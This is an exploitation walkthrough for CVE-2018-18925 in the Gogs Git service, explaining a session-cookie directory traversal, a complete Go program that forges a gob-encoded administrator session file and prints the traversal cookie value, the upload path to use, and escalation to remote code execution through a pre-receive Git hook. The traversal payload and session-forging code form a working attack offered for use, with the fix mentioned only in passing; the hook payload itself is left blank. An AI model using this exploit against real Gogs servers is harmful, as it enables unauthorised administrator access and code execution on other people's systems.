Exploitation of CVE-2018-18925, a remote code execution against Gogs, the self-hosted Git service.

Gogs is built on the Macaron framework, whose session handling works much like PHP's default file-based sessions: the session identifier carried in the cookie is mapped to a file on the file system. When the web server receives a request with a session identifier (as a cookie), it looks up the corresponding file on disk and loads the session state from it.

The vulnerability is a plain directory traversal in how that session file is located: the session identifier is used to build the file path without any validation. For example, setting the i_like_gogits cookie to ../../../../../../etc/passwd makes the server try to load /etc/passwd as a session file and return an error.


To turn the traversal into a session bypass, we need a way to upload a specially crafted file to the server, then use the relative path to that file as our session id. We can create our own crafted session file with:

go run main.go

Uploading the malicious file and logging in as administrator

When you use the “Upload file” functionality, Gogs creates a local working copy of the repository and puts the uploaded files in /data/gogs/data/tmp/local-repo/[REPO_ID]/[FILENAME] (this local copy only exists once you have used the “Upload file” functionality).

Here [FILENAME] is the name of the file you uploaded and [REPO_ID] is the numeric repository identifier, which you can read from the repository's Fork link (in the example, 5 is the repo id).

By default, the sessions are stored in /data/gogs/data/sessions/. Relative to that directory, the uploaded file is therefore reachable as ../tmp/local-repo/[REPO_ID]/[FILENAME]. Using that path as the value of your i_like_gogits cookie makes the server load your forged session instead of a real one, and you are logged in as administrator without ever passing a password check.
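Putting the three steps together (forge the session file, pick the upload location, compute the cookie value), as an added example in Go; it is neither the author's main.go nor code from Gogs or Macaron. It assumes the session store is the go-macaron/session file provider (a gob-encoded map[interface{}]interface{} holding the user id under "uid" as int64 and the user name under "uname", with files laid out under <root>/<sid[0]>/<sid[1]>/<sid>), that the first account (user id 1) is the site administrator, that repo id 5 and the file name sess.bin are placeholders for your target, and Go 1.16+ for os.WriteFile:

```go
// Added example, not the original main.go: forge a Gogs/Macaron session file
// and compute the traversal cookie value that makes the file provider load it.
package main

import (
	"bytes"
	"encoding/gob"
	"fmt"
	"os"
	"path"
)

// AdminSession builds the key/value map Gogs keeps in a session after login.
// Assumption: Gogs stores the user id under "uid" (int64) and the name under
// "uname", and user id 1 is the first, administrator, account.
func AdminSession(uid int64, uname string) map[interface{}]interface{} {
	return map[interface{}]interface{}{
		"uid":   uid,
		"uname": uname,
	}
}

// EncodeSession serialises the map the way the macaron file provider is
// assumed to: a gob-encoded map[interface{}]interface{}, with each value's
// concrete type registered so the interface values can be decoded again.
func EncodeSession(kv map[interface{}]interface{}) ([]byte, error) {
	for _, v := range kv {
		gob.Register(v)
	}
	var buf bytes.Buffer
	if err := gob.NewEncoder(&buf).Encode(kv); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// DecodeSession is the inverse, i.e. what the server does with whatever file
// the cookie points at. Pointing it at a non-session file such as /etc/passwd
// fails here, which is the "error from the server" seen during discovery.
func DecodeSession(data []byte) (map[interface{}]interface{}, error) {
	var kv map[interface{}]interface{}
	if err := gob.NewDecoder(bytes.NewReader(data)).Decode(&kv); err != nil {
		return nil, err
	}
	return kv, nil
}

// TraversalSID builds the cookie value: a path relative to the sessions
// directory that reaches the local-repo directory filled by "Upload file".
func TraversalSID(repoID, filename string) string {
	return "../tmp/local-repo/" + repoID + "/" + filename
}

// SessionFilePath mirrors the assumed file-provider layout
// <root>/<sid[0]>/<sid[1]>/<sid>. With a sid starting "..", the two
// single-character subdirectories are "." and ".", which path.Join cleans
// away, so the traversal resolves exactly to the uploaded file.
func SessionFilePath(root, sid string) string {
	return path.Join(root, string(sid[0]), string(sid[1]), sid)
}

func main() {
	out := "sess.bin" // placeholder file name; it becomes [FILENAME] after upload
	if len(os.Args) > 1 {
		out = os.Args[1]
	}
	data, err := EncodeSession(AdminSession(1, "admin"))
	if err != nil {
		fmt.Fprintln(os.Stderr, "encode:", err)
		os.Exit(1)
	}
	if err := os.WriteFile(out, data, 0o600); err != nil {
		fmt.Fprintln(os.Stderr, "write:", err)
		os.Exit(1)
	}
	sid := TraversalSID("5", out) // repo id 5 is a placeholder
	fmt.Printf("upload %s to repo 5 via \"Upload file\", then send Cookie: i_like_gogits=%s\n", out, sid)
	fmt.Println("the server resolves that sid to:", SessionFilePath("/data/gogs/data/sessions", sid))
}
```

Run it, upload the resulting sess.bin through the web UI of the target repository, and send any authenticated request with the printed cookie. The path check in SessionFilePath is the reason the page's ../tmp/... value works even though the provider nests sessions two directories deep; a proper fix validates the session id (for instance, rejecting anything that is not a short alphanumeric token) before it is ever joined into a path.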

Remote Code Execution:

To get code execution from the administrator session, use the Git hooks functionality of a repository, which runs a shell script on the server whenever a push is processed (in Gogs, Git hooks can only be edited by site administrators, which is why the forged session has to belong to the admin account).

In the pre-receive hook, inject your code:

Then trigger a push, either with git or with the “create file” function of the web UI, and the hook is executed on the server with the privileges of the Gogs process.


